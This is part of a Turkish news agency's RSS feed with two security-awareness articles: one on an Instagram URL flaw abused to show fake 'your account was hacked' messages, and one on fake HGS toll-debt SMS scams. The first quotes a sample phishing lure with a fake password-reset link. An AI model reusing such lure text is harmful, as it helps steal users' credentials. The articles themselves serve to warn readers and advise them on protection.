                            <enclosure url="https://cumha.com.tr/uploads/images/202501/image_870x_677e8bd85900d.webp" length="39150" type="image/webp"/>
            
            <pubDate>Thu, 09 Jan 2025 01:44:57 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Instagram güvenlik açığı, Instagram kimlik avı saldırısı, Instagram hack mesajı, Instagram URL sorunu, Instagram hesap güvenliği, Meta güvenlik açığı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<h3></h3>
<p>Meta'nın popüler sosyal medya platformu Instagram'da, kullanıcıların güvenliğini tehlikeye atan bir güvenlik açığı tespit edildi. Saldırganlar, özel olarak oluşturdukları bir URL aracılığıyla, Instagram alan adı üzerinden kullanıcıların ekranlarına yanıltıcı mesajlar yazdırabiliyor. Bu yöntemle kullanıcılar, hesaplarının hacklendiğine inandırılarak sahte bağlantılara yönlendiriliyor.</p>
<hr>
<h3>Kullanıcıları Kandıran Mesaj ve URL Yöntemi</h3>
<p><img src="https://cumha.com.tr/uploads/images/202501/image_870x_677e8eeb26952.webp" alt=""></p>
<p>Açığın kullanımı sırasında, saldırganlar Instagram'ın yetkilendirme sayfasını hedef alarak, şu mesajı ekrana yazdırabiliyor:</p>
<blockquote>
<p><em>"Hesabınız hacklenmiştir. Lütfen size oluşturduğumuz özel bağlantıdan şifrenizi yenileyiniz. Eğer linke tıklanmıyorsa kopyalayıp yeni sekmede açabilirsiniz: <a rel="noopener" target="_new" href="https://www.sahesite.com/passwd"><span>https</span><span>://www</span><span>.sahesite</span><span>.com</span><span>/passwd</span></a>"</em></p>
</blockquote>
<p>Mesaj, Instagram'ın kendi alan adı üzerinden görüntülendiği için, birçok kullanıcı bu mesajın gerçek olduğunu zannediyor ve saldırganların kontrolündeki sahte bağlantıya tıklıyor. Bu bağlantılar genellikle kullanıcı adı ve şifre bilgilerini çalmak için tasarlanmış kimlik avı (phishing) sitelerine yönlendiriyor.</p>
<hr>
<h3>Kullanıcılar Ne Yapmalı?</h3>
<p>Uzmanlar, bu tür tehditlere karşı kullanıcıları uyararak şu önlemleri öneriyor:</p>
<ol>
<li><strong>Şüpheli Mesajlara Dikkat Edin:</strong> Instagram üzerinden gelen veya Instagram alan adı üzerinde görünen her mesajı sorgulayın.</li>
<li><strong>Bağlantılara Tıklamadan Önce Düşünün:</strong> Instagram'ın alan adını görseniz bile, herhangi bir bağlantıya tıklamadan önce bağlantıyı dikkatlice kontrol edin.</li>
<li><strong>URL Doğrulaması Yapın:</strong> Mesajlardaki bağlantıları kopyalayıp tarayıcıda açmadan önce kaynağın doğruluğundan emin olun.</li>
<li><strong>Resmi Destek Kanallarını Kullanın:</strong> Şifre yenileme veya hesap güvenliğiyle ilgili talepler için Instagram’ın resmi uygulamasını veya destek sayfasını kullanın.</li>
</ol>
<hr>
<h3>Meta'nın Harekete Geçmesi Bekleniyor</h3>
<p>Uzmanlar, Instagram’ın bu açığı bir an önce kapatması gerektiğini vurguluyor. Meta, platformdaki kullanıcı güvenliğini sağlamak amacıyla bu tür açıklarla mücadele etmek için genellikle hızlı hareket ediyor. Ancak, sorunun ciddiyeti göz önüne alındığında, Meta'nın hem teknik önlemler alması hem de kullanıcıları bu tür tehditlere karşı bilgilendirmesi kritik bir önem taşıyor.</p>
<p>Kullanıcılar, bu tür saldırılara karşı bilinçli davranarak hesap güvenliklerini sağlama konusunda daha dikkatli olmalı. Şüpheli durumlarda Instagram’ın resmi destek kanallarından yardım istemek en güvenli yol olacaktır.</p>
<hr>
<p><strong>CUMHA - CUMHUR HABER AJANSI</strong></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>HGS Borcunuz Var Mesajlarına Dikkat! Siber Dolandırıcılar Yeni Bir Tuzak Kurdu</title>
            <link>https://cumha.com.tr/hgs-borcunuz-var-mesajlarina-dikkat-siber-dolandiricilar-yeni-bir-tuzak-kurdu</link>
            <guid>https://cumha.com.tr/hgs-borcunuz-var-mesajlarina-dikkat-siber-dolandiricilar-yeni-bir-tuzak-kurdu</guid>
            <description><![CDATA[ Sahte HGS borç mesajları üzerinden dolandırıcılık yapan siber suçlular, vatandaşları yanıltarak kredi kartı bilgilerini ele geçirmeye çalışıyor. Telefon dolandırıcılığı gibi başka suçlara da zemin hazırlanıyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202501/image_870x_677b2343e48c8.webp" length="31296" type="image/webp"/>
            
            <pubDate>Mon, 06 Jan 2025 11:42:05 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>dolandırıcılık, HGS borç mesajları dolandırıcılığı, HGS sahte mesajlar, siber dolandırıcılık yöntemleri, kredi kartı dolandırıcılığı, telefon dolandırıcılığı riski</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p>Son dönemde, vatandaşların cep telefonlarına sahte HGS (Hızlı Geçiş Sistemi) borç mesajları gönderilerek dolandırıcılık yapılmaya çalışıldığı bildirildi. Dolandırıcılar, bu mesajlar aracılığıyla kullanıcıları sahte bir ödeme ekranına yönlendirerek kredi kartı bilgilerini ele geçirmeyi amaçlıyor.</p>
<p>Söz konusu mesajlarda, HGS borcunuzun ödenmediği ve icra işlemleri başlatılmaması için verilen bir link üzerinden işlem yapmanız gerektiği ifade ediliyor. Ancak, linke tıklayan kullanıcılar sahte bir ödeme sayfasına yönlendiriliyor ve burada girilen tüm kart bilgileri dolandırıcıların eline geçiyor.</p>
<p>Siber güvenlik uzmanlarına göre, bu yöntemle dolandırıcılar sadece kart bilgilerini çalmakla kalmıyor, aynı zamanda mağdurların ileride başka suçlarda hedef alınabileceği bir altyapı oluşturuyor. Örneğin, ele geçirilen bilgiler, telefon dolandırıcılığı gibi farklı yöntemlerle kullanılabiliyor.</p>
<p>Uzmanlar, bu tür mesajlarla karşılaşan vatandaşların kesinlikle belirtilen linklere tıklamamaları ve kişisel bilgilerini paylaşmamaları konusunda uyarıyor. Gerçek HGS borç bilgilerinize sadece PTT’nin resmi kanallarından erişim sağlayabilirsiniz.</p>
<h3>Vatandaşlar Ne Yapmalı?</h3>
<p>Bu gibi durumlarla karşılaşmamak için aşağıdaki adımları izlemek önem taşıyor:</p>
<ol>
<li>Gelen mesajın içeriğine ve göndericisine dikkat edin. Resmi olmayan adreslerden gelen linklere tıklamayın.</li>
<li>Şüpheli bir durumla karşılaştığınızda HGS borcunuzu sorgulamak için doğrudan PTT’nin resmi web sitesine veya uygulamasına giriş yapın.</li>
<li>Mesajın içeriğiyle ilgili emin olamıyorsanız, PTT müşteri hizmetlerini arayarak bilgi alın.</li>
<li>Dolandırıcılık girişimlerini tespit ettiğinizde BTK (Bilgi Teknolojileri ve İletişim Kurumu) veya ilgili emniyet birimlerine ihbarda bulunun.</li>
</ol>
<p>Bu dolandırıcılık yöntemiyle, siber suçluların asıl hedefi kredi kartı bilgilerini ele geçirerek hesabınızdan para çekmek. Ancak, bu bilgiler dolandırıcılar tarafından telefon dolandırıcılığı gibi diğer yöntemlerde de kullanılabilir. Vatandaşların, kişisel bilgilerinin güvenliği konusunda daha dikkatli olması büyük önem taşıyor.</p>
<p><strong>CUMHA - CUMHUR HABER AJANSI</strong></p>]]>
                                    </content:encoded>
                    </item>
                    </channel>
</rss>
